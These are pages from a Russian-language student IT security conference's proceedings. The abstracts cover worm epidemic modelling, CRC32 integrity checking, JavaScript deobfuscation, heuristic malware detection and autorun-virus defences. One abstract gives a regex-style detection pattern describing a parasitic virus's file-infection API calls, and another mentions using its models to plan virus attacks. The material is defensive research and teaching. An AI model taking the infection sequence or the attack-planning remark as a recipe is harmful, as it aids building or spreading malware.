Применение искусственной нейронной сети для шифрования на основе предложенного алгоритма может обеспечить увеличение скорости получения шифротекста из открытого текста и наоборот, особенно если реализация алгоритма будет аппаратной. Кроме того алгоритм не требователен к ресурсам шифрующей аппаратуры.
IT security conference for the next generation
45
4
Секция Антивирусные технологии. Методы обнаружения и предотвращения компьютерных угроз. Средства анализа и тестирования современных средств защиты. Разработка модели эпидемии компьютерных вирусов Лыжонков Д.Ю. Военная академия Ракетных войск стратегического назначения имени Петра Великого Москва, Россия
[email protected] На основе анализа особенностей распространения сетевых вирусов-червей и разработанных моделей эпидемии в вычислительных сетях были разработаны предложения по повышению защищенности вычислительных сетей от воздействия вирусов и на основе имитационной модели, оценена их эффективность. Оценка разработанных предложений показала, что их реализация в вычислительных сетях позволяет свести к минимуму возможность занесения компьютерных вирусов в вычислительные сети, а также в случае возникновения эпидемии значительно уменьшить материальные и временные потери на восстановление сети. По мере развития и усложнения компьютерных систем и программного обеспечения возрастает объем и повышается уязвимость хранящихся в них данных. Одним из факторов, резко повышающих эту уязвимость, является массовое внедрение программно-совместимых мощных персональных электронных вычислительных машин, которое явилось одной из причин появления нового класса вредоносных программ - компьютерных вирусов. Ущерб от вредоносных программ по всему миру составляет десятки миллиардов долларов в год. Основным средством борьбы с компьютерными вирусами является антивирусное программное обеспечение, однако успех в данной борьбе достигается комплексным использованием множества других мер и средств повышения защищенности каналов передачи информации, оперативного обнаружения вредоносных программ, анализом зарождения и развития вирусных эпидемий. Исходя из данных обстоятельств, актуальным направлением становится решение вопроса оценки эффективности такого комплекса. Данная оценка может быть проведена только при наличии адекватной модели вирусной эпидемии. Целью работы является разработка модели эпидемии компьютерных вирусов. Для достижения поставленной цели были решены следующие задачи: проведен анализ существующих компьютерных вирусов, их классификация; проведен анализ методов моделирования эпидемий; предложены модели вирусной эпидемии в вычислительных сетях; проведена оценка эффективности разрабатываемых предложений на базе рассматриваемых моделей эпидемий. На первом этапе произведен анализ существующих компьютерных вирусов и вредоносных программ, особенностей их распространения и деструктивного воздействий. На втором этапе произведен анализ существующих методов моделирования эпидемий. Показана возможность использования моделей биологических вирусных эпидемий для моделирования компьютерных вирусных эпидемий в вычислительных сетях. На третьем этапе разработаны новые модели вирусной эпидемии: аналитическая и имитационная модели эпидемии компьютерных вирусов в вычислительных сетях, проведена их
IT security conference for the next generation
46
отладка и анализ. Результатом явилось создание моделей и реализация имитационной модели в виде программы. В результате исследований разработанных моделей сделан вывод о возможности моделирования общего и частных случаев эпидемии. Показана возможность анализа основных параметров эпидемии на основании полученных моделей. На четвертом этапе разработаны предложения по повышению защищенности вычислительных сетей от компьютерных вирусов. Результатами работы являются две модели: аналитическая и имитационная модели эпидемии компьютерных вирусов в вычислительных сетях, на основании которых с высокой долей вероятности можно прогнозировать и предотвращать развитие эпидемий компьютерных вирусов. Оценка разработанных предложений показала, что их реализация в вычислительных сетях позволяет свести к минимуму возможность занесения компьютерных вирусов в вычислительных сетях, а также, в случае возникновения эпидемии, значительно уменьшить материальные и временные потери на восстановление сети. Практическое применение разработанных моделей заключается в использовании их для исследования широкого круга эпидемий в вычислительных сетях, моделирования распространения конкретных экземпляров сетевых вирусов, а также планирования вирусных атак на вычислительные сети. Следует отметить, что в разработанной имитационной модели вирусной эпидемии существует ряд ограничений и упрощений, что позволяет проводить дальнейшие исследования с целью совершенствования модели и предложений по повышению защищенности вычислительных сетей от компьютерных вирусов. Возможно создание новых направлений исследования: например, использование компьютерных вирусов в информационных войнах.
Сетевая безопасность и вредоносное ПО в операционной системе Linux Лабыскин В.Н. Соавтор: Олейник Г.И. Нижнекамский Химико-Технологический институт (филиал) ГОУ ВПО КГТУ
[email protected];
[email protected] Рассмотрены популярные технологии проводного и беспроводного доступа к интернету с точки зрения безопасности. Даны рекомендации по безопасной работе в сети и настройке файервола в Linux. Приведены основные виды вредоносного ПО в операционной системе Linux. Проанализированы пути проникновения вредоносного кода в систему. Отмечена опасность неграмотного администрирования системы. Рассмотрены возможные пути действия вредоносного кода операционной системы Windows в wine. Даны общие рекомендации по безопасности системы.
IT security conference for the next generation
47
Разработка и программная реализация алгоритма защиты компьютера от вредоносных воздействий Шамаева А.А. Автономная некоммерческая образовательная организация высшего профессионального образования Воронежский институт высоких технологий Воронеж, Россия
[email protected] В последнее время вырос интерес к вопросам защиты информации. Это связывают с тем, что стали более широко использоваться вычислительные сети, что приводит к тому, что появляются большие возможности для несанкционированного доступа к передаваемой информации. В литературе выделяют различные способы защиты информации, среди них выделим: физические (препятствие); законодательные; управление доступом; криптографическое закрытие. Актуальность проблемы защиты информации связана с ростом возможностей вычислительной техники. Развитие средств, методов и форм автоматизации процессов oбpaбoтки инфopмaции, мaccoвocть пpимeнeния ПЭBM peзкo пoвышaют уязвимocть инфopмaции. Ocнoвными фaктopaми, cпocoбcтвующими пoвышeнию этoй уязвимocти, являютcя: резкое увеличение объемов информации, накапливаемой, хранимой и обрабатываемой с помощью ЭBM и других средств автоматизации; сосредоточение в единых базах данных информации различного назначения и различной принадлежности; резкое расширение круга пользователей, имеющих непосредственный доступ к ресурсам вычислительной системы и находящимся в ней массивам данных; усложнение режимов функционирования технических средств вычислительных систем: широкое внедрение мультипрограммного режима, а также режима разделения времени; автоматизация межмашинного обмена информацией, в том числе и на больших расстояниях. Цель работы: построение программного средства, с помощью которого можно отслеживать целостность данных в программной части ПЭВМ и отслеживать изменение аппаратной части ПЭВМ. Для достижения поставленной цели необходимо было решить ряд задач: 1. Реализовать алгоритм расчета CRC32. 2. Разработать алгоритм отслеживания внешних устройств. 3. Построить программного средства на основе изученных методов. Рассмотрим общую схему алгоритма проверки целостности данных ПЭВМ. Она приведена на Рисунке 1. Общая схема, представленная на Рисунке 1, позволяет представить комплексный подход к определению целостности данных в программной и аппаратной части ПЭВМ.
IT security conference for the next generation
48
Входные параметры
Алгоритм расчета CRC32
Алгоритм проверки внешних устройств
Анализ результатов
Вывод сообщения
Рисунок 1. Общая схема алгоритма проверки целостности данных. Рассмотрим эту схему поблочно: 1. Входные данные. Здесь под входными данными понимается как любой файл, хранящийся на жестком диске, так и внешние устройства подключенные к ПЭВМ. 2. Алгоритм расчета CRC32. Данный алгоритм позволяет отследить целостность данных в программной части персонального компьютера, а также производить их проверку через интервалы времени, выбираемые пользователем. 3. Алгоритм проверки внешних устройств. Данный алгоритм позволяет отследить изменения в аппаратной части персонального компьютера, а также производить проверку устройств через интервалы времени, выбираемые пользователем. 4. Анализ результатов. В данном блоке происходит сравнение эталонных данных с данными, полученными в результате работы алгоритмов. 5. Вывод сообщения. Выводится сообщение об изменении или неизменении файлов и устройств персонального компьютера, на основе чего оператор принимает решение о целостности данных системы. Поясним подробнее алгоритм проверки внешних устройств. Схема его приведена на Рисунке 2.
IT security conference for the next generation
49
начало
Проверка подключенных устройств
Создание эталонного файла состояния системы
Создание сравнения
файла
Сравнение двух файлов: Эталонного файла и Файла сравнения Выдача сообщения
конец
Рисунок 2. Алгоритм проверки подключенных устройств Поясним вышеуказанную схему алгоритма. В ней можно отметить следующие основные операции. 1. Проверка подключенных устройств. Запускается стандартная программа Windows, MSINFO32, которая содержит информацию обо всех подключенных устройствах и программном обеспечении на данном компьютере. 2. Создание эталонного файла. Из стандартной программы MSINFO32 копируется информация о всех подключенных на данный момент времени устройствах в текстовый файл, именуемый ―Эталонным‖. 3. Создание файла сравнения. Для выяснения изменения структуры подключенных устройств по истечении некоторого времени повторяется последовательность действий, описанных в пункте 2. За исключением того, что информация сохраняется в текстовый файл ―Файл сравнения‖. 4. Сравнение двух файлов: Эталонного и Файла сравнения. В этом блоке происходит сравнение двух текстовых файлов для определения, изменялись ли устройства за прошедший интервал времени. 5. Выдача сообщения о добавлении нового устройства (или нескольких устройств) или сообщения о том, что состояние системы не изменилось. На основе алгоритма расчета контрольной суммы и алгоритма проверки внешних устройств разработан комплексный алгоритм защиты целостности данных ПЭВМ. С использованием рассмотренного алгоритма построена программа в среде визуального программирования Delphi 7.0. Вся программа разделена на две части: устройства и контрольные суммы. Переход между окнами осуществляется при помощи аналогичных вкладок. В окне программы Контрольные суммы можно проводить расчет контрольной суммы, как файла, так и всех файлов в папке. Так же в этом окне можно рассчитать контрольную сумму всех файлов в папке и занести папку в меню программы ―Папки для проверки‖ для дальнейшей проверки целостности данных, хранящихся в этой папке. Для проверки целостности данных, хранящихся в папке, необходимо:
IT security conference for the next generation
50
1. Выбрать нужную папку в директории. 2. Нажать кнопку ―Добавить папку‖. 3. Поставить галочку ―Создать эталонные файлы‖. 4. Нажать кнопку ―Расчет CRC папки‖. После чего будет произведен расчет контрольной суммы всех файлов в папке и это значение будет запомнено программой. Это позволит произвести проверку всех файлов в папке через некоторый интервал времени, выбираемый пользователем. Для проверки контрольной суммы всех файлов в папке необходимо нажать кнопку ―Проверка CRC‖ и программа выдаст сообщение о совпадении или несовпадении контрольной суммы папки. Удаление или изменение хотя бы одного файла приведет к изменению контрольной суммы и программа при следующей проверке выведет предупреждающее сообщение Для проверки внешних устройств необходимо перейти к вкладке ―Устройства‖. После чего создать эталонный файл с состоянием системы. Для этого необходимо произвести последовательность действий: 1. Нажать кнопку ―Создать эталон‖. 2. Проделать действия по подсказкам программы. 3. Аналогично создать файл сравнения. 4. Нажать кнопку ―Выбор файла‖ и выбрать файл с именем ETALON.txt. Повторить нажатие кнопки ―Выбор файла‖ и выбрать файл FILESRAVNENIA.txt 5. Нажать кнопку ―Проверка новых устройств‖. После проделанных действий будет выдано соответствующее сообщение. Для проверки через любой интервал времени требуется пересоздать FILESRAVNENIA.txt и проделать пункты 4-5, описанные выше. Если в аппаратной части ПЭВМ произошли изменения, программа выдаст соответствующее сообщение. В результате выполнения работы: 1. Проведен анализ современных подходов к анализу целостности данных. Проанализированы достоинства и недостатки этих подходов. Даны рекомендации по построению алгоритма целостности данных на основе комбинации аппаратного и программного подходов. 2. Достаточно подробно описана структура, достоинства и недостатки и реализация алгоритма контрольных сумм. Так же был разработан алгоритм проверки внешних устройств, позволяющий отслеживать изменения в аппаратной части компьютера. Подводя итог можно сказать, что был разработан комплексный алгоритм проверки целостности данных и изменения архитектуры внешних устройств персонального компьютера. 3. Было дано описание программного продукта, созданного на основе алгоритма контрольной суммы и алгоритма проверки внешних устройств, позволяющего отслеживать изменения в программной и аппаратной части ПЭВМ. Достоинством программного продукта является простота работы и наглядность при работе с ним.
IT security conference for the next generation
51
Исследование графических интерфейсов средств антивирусной защиты Гуляев А.И. Томский государственный университет систем управления и радиоэлектроники Томск, Россия
[email protected] Сегодня существует множество программных продуктов, обеспечивающих безопасность персональных компьютеров от вредоносного программного кода. Каждый продукт направлен на конкретного потребителя, у которого, в свою очередь, имеются свои требования к функционалу и пользовательскому интерфейсу. В рамках работы по сравнительному тестированию средств защиты от несанкционированного доступа (антивирусов) был рассмотрен ряд продуктов для защиты персональных компьютеров от вредоносных программ (вирусов). Цель данного исследования изучить графические интерфейсы программ и выявить их положительные и отрицательные качества. Результаты исследования можно использовать для привлечения новых покупателей антивирусных продуктов.
Защита интерпретируемого кода программных продуктов: методы обфускации и деобфускации Рой К.С. Пермский государственный университет Пермь, Россия
[email protected]
В данной работе представлены современные методики обфускации и деобфускации интерпретируемого кода, представлена формализация процесса обфускации, рассмотрены различные методики (в том числе свои) преодоления обфускации (методы деобфускации) интерпретируемого кода. В работе также подробно описана схема реализуемого программного комплекса. В настоящее время перед компаниями, занимающимися производством и продажей программного обеспечения для персональных компьютеров, очень остро стоит проблема интеллектуальной защиты своих продуктов. Еще более актуальной является проблема защиты программ, которые не компилируются в исполняемый файл, а поставляются конечным пользователям в виде кода, интерпретируемого во время выполнения программы. Необходимость в сокрытии исполняемого кода также возникает и у различных мошенников, орудующих в сети. И первые, и вторые для затруднения изучения кода применяют различные методики «запутывания». Операцией обфускации (от английского obfuscation – «запутывание») называется совокупность методик и средств, направленных на затруднение анализа программного кода. Другими словами, запутанной (обфусцированной) называется программа, которая на всех допустимых для исходной программы входных данных выдаѐт тот же самый результат, что и оригинальная программа, но более трудная для анализа, понимания и модификации человеком. Запутанная программа получается в результате применения к исходной незапутанной программе запутывающих преобразований (преобразований обфускации). Если кто-то что-то скрывает, значит, есть те, кому жизненно необходимо узнать то, что скрыто. Поэтому в настоящее время очень актуальна проблема распутывания (деобфускации) запутанного программного кода. Задача деобфускации интерпретируемого кода в наиболее общей формулировке может быть сформулирована следующим образом. При деобфускации привести код в первоначальный вид невозможно. Но вполне можно "облагородить" его до такого состояния, когда можно без особого труда разобраться в алгоритме и внести необходимые изменения. Под преобразованием
IT security conference for the next generation
52
деобфускации будем понимать (в целом) процесс, обратный процессу обфускации. Иными словами, это процесс, возвращающий имеющуюся измененную программу к виду, более похожему на первоначальный. В силу особенностей обфускации, рассмотренных в настоящей работе, привести программу к первоначальному виду невозможно. В работе представлена абстрактная формализация запутывающих преобразований, которую планируется развивать в дальнейшем. Вопрос о том, существуют ли запутыватели для отдельных классов свойств программ, и насколько широки и практически значимы эти классы свойств, остаѐтся открытым. С практической точки зрения запутывание программы можно рассматривать как такое преобразование программы, которое делает еѐ обратную инженерию экономически невыгодной. Несмотря на слабую теоретическую проработку, уже разработано большое количество инструментов для запутывания программ. Целью работы является дальнейшее совершенствование имеющейся модели обфускации и деобфускации интерпретируемого программного кода, основанной на имеющихся работах после детального изучения свойств этих сущностей, создание собственных методов деобфускации кода, программная реализация теоретических разработок. Задача возникла в результате почти полного отсутствия в свободном доступе подробных материалов по данной тематике – в основном все работы являются реферативными от двух-трех серьезных – это касается обфускации, работ по деобфускации в открытом доступе вообще почти нет. Данная задача является актуальной вследствие того, что проблема защиты программного обеспечения остро встала в последнее время. Актуальность распутывания программ также интересна с точки зрения дальнейших попыток реализации автоматического подписания кода, которое значительно бы упростило человеку задачу понимания. При реализации деобфускации грубое описание действий интерпретируемого кода является вполне реальной задачей. С другой стороны, часто код интерпретируемых вирусов (или просто сомнительный код) подвержен обфускации, поэтому деобфускация такого кода может значительно облегчить его понимание. Рассмотрим аспекты задач запутывания и анализа запутанных программ: 1) теоретический аспект, включающий в себя разработку новых алгоритмов для преобразования графа потока управления или трансформации данных и исходного кода программы. Помимо этого, немаловажным является и анализ разработанных методик (оценка сложности и анализа раскрываемости запутывания), так как придумать преобразования несложно, но нужно ещѐ и доказать, что данные преобразования имеют смысл; 2) прикладной аспект включает в себя разработку конкретных методов запутывания, то есть наилучших комбинаций алгоритмов, эмпирический сравнительный анализ различных методов, эмпирический анализ устойчивости методов и т. д.; 3) психологический аспект пока не поддаѐтся формализации, но не может игнорироваться. Обратная инженерия (понимание) программ – это процесс, результатом которого является некоторое знание субъекта, изучающего программу и являющегося неотъемлемой частью процесса понимания [Ошибка! Источник ссылки не найден.]. Методы запутывания должны максимально использовать свойства (точнее, слабости) человеческой психики [Ошибка! Источник ссылки не найден.]. Это так называемый «высший пилотаж», когда программа-обфускатор пользуется различными психологическими особенностями человека, который попытается понять код; если же мы говорим об обратном процессе, то очень часто при анализе, например, запутанных компьютерных вирусов аналитики опираются на уравновешенность человека, писавшего данный код. Стоимость (cost) преобразования [5] – это метрика, которая позволяет оценить, насколько больше требуется ресурсов (памяти, процессорного времени) для выполнения запутанной программы, чем для выполнения исходной программы. Стоимость определяется по следующей шкале: 1) бесплатное преобразование – увеличивает функцию (длину программы, время работы, требуемый объем памяти) после запутывания настолько незначительно, что изменениями можно пренебречь. Такие преобразования выполняются, как правило, только вручную, или же они не являются эффективными по сравнению с комплексом запутывающих действий, которые почти наверняка усложняют программный код; 2) дешевое преобразование – увеличивает функцию на O(m), где m – длина исходного кода; k 3) умеренное по стоимости преобразование – увеличивает функцию на O(m ), где m – длина исходного кода, а k > 1; 4) дорогое преобразование – экспоненциально увеличивает функцию по сравнению с исходным значением. Применяются для программ, производительностью которых можно пренебречь в каком-то смысле, то есть производительность не является критическим параметром программного комплекса. Рост потребляемых программой ресурсов после обфускации в теоретической модели допускается полиномиальный (в идеале – не более полиномиального роста). На практике же программа-обфускатор выполняет запутывание в рамках наперед заданных ограничений по IT security conference for the next generation
53
ресурсам. Как правило, эти ограничения позволяют программе «вырасти» лишь в константное число раз. Получается следующая закономерность – чем проще метод, тем меньше его цена и тем менее эффективен метод. Самые примитивные методы имеют практически нулевую цену. Конечно же, речь идет только об автоматических преобразованиях, то есть тех, которые выполняет машина. Для реализации практической части настоящей работы при разработке алгоритмов было решено создать следующие модули (см. Рисунок 1) (ниже представлены модули с их кратким описанием): 1) модуль парсинга HTML-страницы. Данный модуль отвечает за разбор полученной на входе HTML-страницы во фреймовую сеть тегов согласно [4]; 2) модуль сбора всего JavaScript-кода. Данный модуль необходим для извлечения из пропарсенного HTML-кода необходимого нам JavaScript-кода; 3) модуль загрузки недостающего JavaScript-кода. Дозагрузка недостающего кода для создания полной картины; 4) модуль парсинга JavaScript-кода. Представление всех переменных, констант, функций и прочих конструкций языка в виде динамической структуры (синтаксического дерева и ориентированного ациклического графа); 5) модуль деобфускации. Подборка наилучшего метода (применение различных методов) из комплекта рассмотренных выше для данного исходного кода. Основной модуль инструментального средства по распутыванию запутанного кода; 6) модуль обфускации. Прежде всего, для проверки деобфускации и изучения свойств обфускации; 7) модуль общего логирования. Поскольку каждый модуль будет оставлять свои собственные логи, цель данного модуля – составление общего отчета о проделанной работе. Начаты работы по созданию модуля, целью которого будет являться автоматическое подписание действий программы (задача распознавания семантики программы по ее синтаксису является алгоритмически неразрешимой, поэтому предполагаемый модуль будет выполнять эту задачу лишь частично). Основной целью данного модуля является сбор и оформление статистики, накопленной остальными модулями. В работе рассмотрены различные алгоритмы одного из наиболее популярных в последнее время методов защиты программ – обфускации (запутывания). Были изучены и проанализированы различные алгоритмы запутывания с точки зрения возможного их распутывания. Сделана попытка определения и классификации методов анализа программ для противодействия большинству из описанных методов запутывания. Так как теория обфускации в настоящее время очень активно развивается и придумываются новые, более совершенные методы запутывания, то я считаю, что данная работа по анализу и распутыванию кода окажется весьма полезной для исследования эффективности распутывания новых методов обфускации. В данной работе в качестве языка был предложен JavaScript, но теория, изложенная выше, вполне может быть применимой и к другим интерпретируемым языкам программирования. Интересно отметить, что в [Ошибка! Источник ссылки не найден.] упоминаются некоторые приемы обфускации, воздействующие на человеческую психику, ставя человека в моральные рамки невозможности совершения процесса деобфускации, а также заявляется, что на сегодняшнее время не существует алгоритмов, целиком и полностью удовлетворяющих всем требованиям к подобным алгоритмам. При создании разрабатываемой модели обфускатора, необходимо попытаться «изобрести» такие алгоритмы, а в модели деобфускатора попытаться объяснить, почему это невозможно (если не получится, конечно). При совершенствовании практической части работы (точнее – деобфускации) интересным моментом будет применение теории генетических алгоритмов.
IT security conference for the next generation
54
Исследуемая страница
Загружаемые скрипты (страницы)
HTML-парсер
лог
JS-загрузчик Модуль логирования
JS-сборщик лог обфускатор JS-парсер
лог
деобфускатор лог
лог
«распутанный» код
Рисунок 1. Схема модулей проекта (практическая реализация)
IT security conference for the next generation
55
Эвристические методы детектирования вредоносных программ на основе сценариев Беркович Е.Л. Соавтор: Лотоцкий А.А. Одесский национальный политехнический университет. Институт компьютерных систем Одесса, Украина
[email protected]
В данной работе рассматриваются существующие антивирусные решения и предлагается экспертная антивирусная система, основанная на сценариях. Эта эвристическая система способна анализировать действия в системе и принимать решения, являются ли эти действия подозрительными. Также система может объяснить, почему был сделан такой или иной вывод, благодаря чему может быть использована в составе различных антивирусных программ. Экспертная система состоит из двух основных частей: база знаний с менеджером базы знаний и решателя, который использует базу знаний при вынесении решений. В дополнение, в работе приведена реализация решателя на базе регулярных выражений и описаны дальнейшие планы по разработке. Сценарии рассматриваются как описание действий программы, которые могут быть потенциально опасными. Для представления сценариев в базе знаний мы предлагаем использовать несколько операций (по аналогии с регулярными выражениями): конкатенация, дизъюнкция, итерации и т.д. Например: Сценарий работы паразитического вируса = (Поиск_исполняемого_файла – Открытие_файла – Запись_в_секцию_кода – Модификация_заголовка?)+ Поиск_исполняемого_файла= API_функция_FindFirstFile–API_функция_FindNextFile? Запись_в_секцию_кода = Переход_к_секции_кода – API_функция_WriteFile Открытие_файла = API_функция_CreateFile | API_функция_OpenFile Также мы привели обобщенные иерархии сценариев для базовых типов вредоносных программ (по классификации Лаборатории Касперского): червей, вирусов, троянских программ, и описали поведение некоторых представителей этих типов при помощи языка регулярных выражений. Создана программа, с помощью которой сравниваются последовательности действий в системе с выражениями в виде регулярных выражений и делается вывод, является ли данная последовательность подозрительной.
IT security conference for the next generation
56
Методы деобфускации основанные на анализе частоты появления полезных и мусорных команд Антонов А.Е. Филиал ГОУВПО «Московский Энергетический Институт (Технический Университет)» Смоленск, Россия
[email protected] Обфускация — один из эффективных методов предотвращения анализа исполняемого кода. Существуют различные способы обфускации. Один из них - добавление мусорных команд в текст программы. Введем ряд понятий для дальнейшей работы: Линейная программа — это программа, в которой отсутствуют команды, изменяющие порядок выполнения других команд. Простой обфускатор — это программа, добавляющая между полезными командами случайное количество мусорных. Мусорные команды выбираются случайным образом из конечного множества. Частота команд - это отношение количества повторений данной команды к длине участка, на котором производился расчет. Задача деобфускации состоит в отделении полезных команд от мусорных. Решим задачу деобфускации для частных случаев модели простого обфускатора: 1) Если множества полезных и мусорных команд не пересекаются, количество мусорных команд много меньше количества полезных и вероятность появления любой команды в любом месте программы одинакова для всех полезных или всех мусорных команд соответственно, тогда задачу деобфускации можно решить, просто отделив команды по частоте. Мусорные команды будут встречаться чаше полезных, поскольку множество мусорных команд меньше. 2) Если множества полезных и мусорных команд не пересекаются и вероятность появления мусорных команд одинакова, в то время как вероятность появления полезных команд различна, задачу деобфускации можно решить, отделив набор команд, частоты которых совпадают: это и будут мусорные инструкции. 3) Задачу, описанную в предыдущем пункте можно решить более эффективно, если размер множества мусорных команд много меньше их общего количества в обфусцированной программе. Для решения нужно воспользоваться методом скользящего окна: фиксируется размер окна и при его движении подсчитывается частота команд в окне. Для мусорных команд частота останется неизменной, в то время как для полезных будет значительно меняться. 4) Если множество мусорных команд пересекается со множеством полезных, задача деобфускации может быть решена методом скользящего окна на множестве программ: окно синхронно перемещают для множества программ и подсчитывают частоты команд в окне. В месте расположения полезных команд будут наблюдаться всплески частоты. Итак, задача деобфускации для модели простого обфускатора может быть эффективно решена.
IT security conference for the next generation
57
Способы защиты от autorun-вирусов Саитов М.Н. ГОУ ВПО «Башкирский государственный аграрный университет» Уфа, Россия
[email protected] Flash-USB-накопители (далее флешки) давно стали неотъемлемым атрибутом повседневной жизни, ведь хранить и переносить информацию на них очень удобно. Маленькая штучка размером с ноготок может вмещать в себя десяток фильмов, не говоря о сотнях фотографий и тысячах текстовых файлов – простота передачи данных послужила большой распространенности данного носителя, чем быстро воспользовались вирусописатели. Стали появляться всевозможные USB-шные (флешечные) вирусы, специально созданные для съемных носителей и распространяемые при помощи них. Autorun-вирусы получили свое название из-за метода распространения – они записывают на флешку кроме самого файла с телом вируса также и файл autorun.inf, который при подключении флешки к компьютеру запускает тело вируса. Это сравнительно новый тип вирусов, появившийся в эпоху широкого распространения флешек, карт памяти и других внешних устройств. Их вредоносное действие такое же, как и у обычных вирусов, начиная от шпионажа за вашим компьютером, заканчивая уничтожением данных. В данной статье опишем способы защиты и удаления вирусов с флешек. Разумеется, от большинства подобных вирусов помогает установка обычного антивируса. Однако, количество различных видов autorun-вирусов невероятное, т.к. для написания такого вируса не требуется высокой квалификации. Кроме того, autorun-вирусы распространяются в оффлайн, и поэтому могут попадать на анализ к техническим службам антивирусных компаний с серьезным запозданием. В связи с этим, антивирусная программа может просто не увидеть «новый» вирус. На сегодняшний день существует множество программ антивирусов и фаерволов (англ. Firewall), например AutoRunGuard, Flash Guard, USB Disk Security и др. Но на них я останавливаться не буду, так как этих программ очень много и они все разные, при этом они не всегда обеспечивают необходимую защиту. А мы же рассмотрим простые и более продвинутые способы защиты от флешечных вирусов и их удаления системными средствами. Одним из эффективных способов защиты от autorun-вирусов является полное отключение автозапуска. На самом деле все не так просто. Даже если поставить запрет через локальные политики Windows, в системе все равно остаются уязвимые места, позволяющие вирусу проникнуть в систему. Поэтому нужно правильно и окончательно отключить автозапуск системы. После отключения автозапуска, прежде чем открыть флешку, нужно сначала поискать в нем файл Autorun.inf. Если такой найдется, то следует предпринять необходимые меры. Когда-то было достаточно просто создать файл в корневом каталоге флешки с именем AUTORUN.INF, выставив ему атрибуты «Read only» и «Hidden». Так мы препятствовали созданию файла с тем же именем. На сегодняшний день это не вариант, так как современные вирусы «научились обходить» данный способ. А мы же рассмотрим способ, который большинство вирусов обходить пока не научилось. Есть хороший вариант с форматированием флешки в файловую систему NTFS и задать права доступа файлу autorun.inf. В файловой системе FAT32 нельзя задать права доступа к файлам, а в NTFS такая возможность имеется. Поэтому отформатируем флешку в NTFS и проставим права доступа к файлу. На самом деле самая лучшая защита на флешке – запрет записи на аппаратном уровне. Несколько лет назад у многих флешек блокирующий переключатель был по умолчанию, но сейчас производители отошли от этой практики. Зато почти на всех картах памяти Secure Digital (SD) переключатели по-прежнему есть. Если есть подозрение на заражение, достаточно просто переключить карту памяти в положение «read only», и никакой вредоносный объект не сможет проникнуть на флешку. Все описанные способы не дают стопроцентной защиты от autorun-вирусов. С каждым днем появляются новые вредоносные программы. С каждым днем эти вредоносные программы становятся «умнее». Поэтому становится все труднее с ними справляться. Противостояние вирусов и владельцев компьютеров длится уже не первый год и все больше напоминает классическую борьбу брони и снаряда. Даже если мы добавили в реестр записи с блокированием файлов автозапуска, все равно для вирусов есть способ обойти этот запрет. Поэтому остается регулярно обновлять базы антивирусной программы и оперативно устанавливать критические обновления для ОС Windows.
IT security conference for the next generation
58
5
Секция
Образовательные проекты (программы и методики обучения) в области компьютерной безопасности Учебный проект для студентов высших учебных заведений по противодействию кибертерроризму Бешенцева М.С. соавторы: Сафаргалеева Л.Ф., Фахриев А.В., Бешенцева М.С. Магнитогорский Государственный Университет Магнитогорск, Россия
[email protected] Человечество стремительными темпами развивает все новые и новые информационные технологии. Сотни миллиардов посланий электронной почты, телефонных звонков ежедневно проходят через Интернет и сети сотовых операторов. Они вмещают массу различной информации практически всей жизни людей Земли, включая их частную жизнь, бизнес, финансы, настроения, чувства, и многое другое. Вся эта информация накапливается в колоссальных базах данных многочисленных государственных и коммерческих организаций, интернета и мобильной связи. Практически никто не знает, сколько стоит эта информация, и оценивают ее в основном только после того, как она была украдена. Зато кибертеррористы прекрасно осведомлены о реальной стоимости информации, которую они планируют захватить или разрушить. Кибертерроризм – это один из многих видов киберугроз, которые вызывают всеобщую озабоченность. Среди других таких угроз взлом компьютеров, кибервойна и киберпреступность. Кибертерроризм, однако, отличается тем, что в число его целей могут входить политическая или экономическая дестабилизация, саботаж, кража военных или гражданских активов и ресурсов в политических целях. По нашему мнению, кибертерроризм в современном мире тесно сращивается с киберпреступностью. Грани между ними настолько размыты, что точно определить их чрезвычайно сложно. Это очень опасно, так как затрудняет выявление истинных заказчиков преступления. Под невинными забавами хакеров могут скрываться могущественные террористические организации, которые разрабатывают планы по дестабилизации, ограблению и разрушению стран. Именно по этим причинам нами был разработан данный проект. Цель данного проекта - ознакомить студентов с глобальной мировой проблемой кибертерроризма. В проекте рассмотрены ключевые понятия кибертерроризма и его классификация. Также дается целостное представление о кибертерроризме как угрозе информационной безопасности. Рассмотрены опасность кибертерроризма и его примеры. Для противодействия кибертерроризму необходимо развивать два направления – технологическая защита и обучение граждан основам информационной безопасности. Однако, как показала практика, в государственных стандартах предметов, посвященных информационной безопасности и защите информации, по которым обучаются студенты, проблема кибертерроризма не рассматривается. Таким образом, цель нашего проекта – разработать учебный проект для студентов гуманитарных специальностей высших учебных заведений, включающий в себя теоретические и практические материалы по проблеме противодействия кибертерроризму. Объект исследования – кибертерроризм. Предмет исследования – основы противодействия кибертерроризму.
IT security conference for the next generation
59
Задачами проекта являются изучение современного состояния проблемы противодействия кибертерроризму, рассмотрение проявления кибертерроризма в сегодняшнем мире, разработка учебного проекта «Противодействие кибертерроризму» для студентов гуманитарных специальностей высших учебных заведений. Проект дает возможность студентам узнать методы противодействия кибертерроризму, а также опыт противодействия кибертерроризму по всему миру. Рассматривается современное состояние проблемы кибертерроризма. Данный проект достаточно актуален, поэтому найдет свое практическое применение в качестве учебного проекта для студентов ГОУ ВПО «Магнитогорский Государственный университет» в следующих дисциплинах: «Информационная безопасность в системе открытого образования» для специальности 050202 – «Информатика»; «Информационная безопасность и защита информации» для специальности 350800 – «Документоведение и документационное обеспечение управления»; «Защита информации» для специальности 080507 – «Менеджмент организации»
Учебный курс «Основы технологий информационной безопасности» Мифтахова Л.Х. Нижнекамский Химико-Технологический институт(филиал) ГОУ ВПО КГТУ Нижнекамск, Россия
[email protected] В настоящее время большое внимание уделяется подготовке высококвалифицированных специалистов экономического и гуманитарного профиля, способных решать не только профессиональные задачи, но и владеющих арсеналом средств современных информационных технологий. Однако бурное развитие применения новых информационных технологий в экономике привело к появлению зависимости их эффективного применения от степени безопасности. Огромные убытки, которые несут бизнес и государство в связи с кражами, взломами и мошенничеством в сфере информационной безопасности, формирует спрос не только на программные и технические решения. Потребность в квалифицированных специалистах, которые грамотно могут применять технологии информационной безопасности, увеличивается из года в год. В учебных планах обучения специальности «Экономика и управление на предприятии» отдельного предмета, посвященного информационной безопасности, нет. В связи с этим был разработан факультативный курс для данной специальности, который позволяет изучить основы технологий информационной безопасности. Курс разбит на три логически связанных раздела: 1. Основы информационной безопасности. 2. Криптография. Методы и алгоритмы криптографической защиты. 3. Вирусы и средства борьбы с ними. Антивирусная защита компьютерных систем. Спам и методы борьбы с ним. Основной задачей курса является обучение студентов практическому применению антивирусных программ, криптографической защиты и методов борьбы со спамом
IT security conference for the next generation
60
Системы дистанционного обучения Коробулина О.Ю. Петербургский Государственный Университет Путей сообщения Санкт-Петербург, Россия
